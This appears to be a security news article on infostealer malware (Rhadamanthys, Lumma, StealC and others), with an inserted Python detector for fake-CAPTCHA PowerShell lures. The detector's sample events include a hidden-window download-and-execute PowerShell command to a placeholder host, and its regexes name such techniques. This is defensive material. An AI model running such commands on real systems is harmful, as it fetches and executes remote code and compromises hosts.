The threat actors behind the Rhadamanthys information stealer have introduced advanced features, including the use of artificial intelligence (AI) for optical character recognition (OCR), which plays a key role in what’s called “Seed Phrase Image Recognition.”
"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies," said Recorded Future’s Insikt Group in an analysis of version 0.7.0 of the malware.
"The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation," they added.
First discovered in the wild in September 2022, Rhadamanthys has quickly become one of the most formidable information stealers advertised under the malware-as-a-service (MaaS) model, alongside other malicious software like Lumma.
Despite bans from underground forums like Exploit and XSS for targeting entities in Russia and former Soviet Union states, Rhadamanthys remains highly active. The developer, known as "kingcrete" or "kingcrete2022," has found alternative ways to promote the malware through platforms like Telegram, Jabber, and TOX.
The malware, sold on a subscription basis for $250 per month (or $550 for a 90-day period), enables customers to harvest a wide array of sensitive data from compromised systems. This includes system information, credentials, cryptocurrency wallets, browser passwords, cookies, and other application data. It also includes mechanisms to thwart analysis within sandbox environments.
The latest release, version 0.7.0, launched in June 2024, offers significant improvements over its predecessor (version 0.6.0 from February 2024). According to Recorded Future, "It comprises a complete rewrite of both client-side and server-side frameworks, improving the program’s execution stability. Additionally, 30 wallet-cracking algorithms, AI-powered graphics, and PDF recognition for phrase extraction were added. The text extraction capability was enhanced to identify multiple saved phrases."
One of the most concerning new features allows threat actors to run and install Microsoft Software Installer (MSI) files, helping them evade detection by security solutions. There is also a new configuration setting to prevent re-execution within a specified time frame.
A notable aspect of Rhadamanthys is its plugin system, which extends its functionality to include keylogging, cryptocurrency clippers, and reverse proxy capabilities.
"Rhadamanthys is a popular choice for cybercriminals," Recorded Future said. "Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of."
The Rhadamanthys evolution comes as Google-owned Mandiant detailed the use of custom control flow indirection by Lumma Stealer, another information-stealing malware, to complicate binary analysis.
"This technique thwarts all binary analysis tools, including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process but also automation tools designed to capture execution artifacts and generate detections," said Mandiant researchers Nino Isakovic and Chuong Dong.
Alongside Rhadamanthys and Lumma, other stealer malware families such as Meduza, StealC, Vidar, and WhiteSnake have been updating their capabilities, including bypassing Chrome's app-bound encryption to steal browser cookies.
Notably, WhiteSnake Stealer has added functionality to extract CVC codes from credit cards stored in Chrome, emphasizing how malware threats continue to evolve.
Additionally, researchers have uncovered a new Amadey malware campaign that uses an AutoIt script to open the victim's browser in kiosk mode, tricking users into entering their Google account credentials. This information is later harvested by stealers like StealC.
These new tactics also coincide with drive-by download campaigns that trick users into executing PowerShell code under the guise of CAPTCHA verification, delivering stealers like Lumma, StealC, and Vidar.
"Victims are deceived into manually launching the Run menu and executing malicious PowerShell commands," Secureworks noted. "This attack circumvents browser security controls by opening a command prompt, allowing the execution of unauthorized code on the host system."
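As an added defender-side example that is not part of the article or any vendor's tooling: a small detector for the Run-menu PowerShell pattern Secureworks describes, run over constructed Sysmon-style process-creation events. The field names, sample command lines and the placeholder URL are assumptions made for the example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1-style fields).
# They are not real telemetry; the URL and base64 value are placeholders.
SAMPLE_EVENTS = [
    {"User": "DESKTOP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc QUJDREVGR0g="},
    {"User": "DESKTOP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"User": "DESKTOP\\bob", "ParentImage": r"C:\Users\bob\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -NoProfile -File build.ps1"},  # benign dev workflow
    {"User": "DESKTOP\\carol", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "Invoke-RestMethod http://placeholder.invalid/stage | Invoke-Expression"'},
]

# Command-line traits that, in combination, characterise the fake-CAPTCHA lure.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "web_download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
RUN_DIALOG_PARENT = "explorer.exe"  # the Run menu launches its child under explorer.exe
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(event: dict) -> dict:
    """Score one event; flag it when two or more independent traits line up."""
    reasons = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    if basename(event["ParentImage"]) == RUN_DIALOG_PARENT and basename(event["Image"]) in SHELLS:
        reasons.insert(0, "shell_spawned_by_explorer")  # consistent with a Run-dialog launch
    return {"user": event["User"], "flagged": len(reasons) >= 2, "reasons": reasons}


def scan(events: list) -> list:
    """Return only the flagged events so an analyst can triage them."""
    return [r for r in (analyze(e) for e in events) if r["flagged"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["user"], ", ".join(hit["reasons"]))
```

The two-trait threshold keeps an interactive `powershell.exe` opened from the Run box from alerting on its own, while the hidden-window, encoded or download-and-execute combinations still surface regardless of parent.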
Phishing and malvertising efforts have similarly led to the distribution of other stealers, including Atomic macOS Stealer (AMOS), Rilide, and a new variant of Snake Keylogger.
Furthermore, information stealers like Rhadamanthys, Atomic, and StealC have been involved in over 30 scam campaigns orchestrated by the cybercrime group "Marko Polo." These campaigns target cryptocurrency users and gamers through spear-phishing tactics, tricking victims by impersonating legitimate brands.
"Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media," Recorded Future added, highlighting that tens of thousands of devices globally may have been compromised.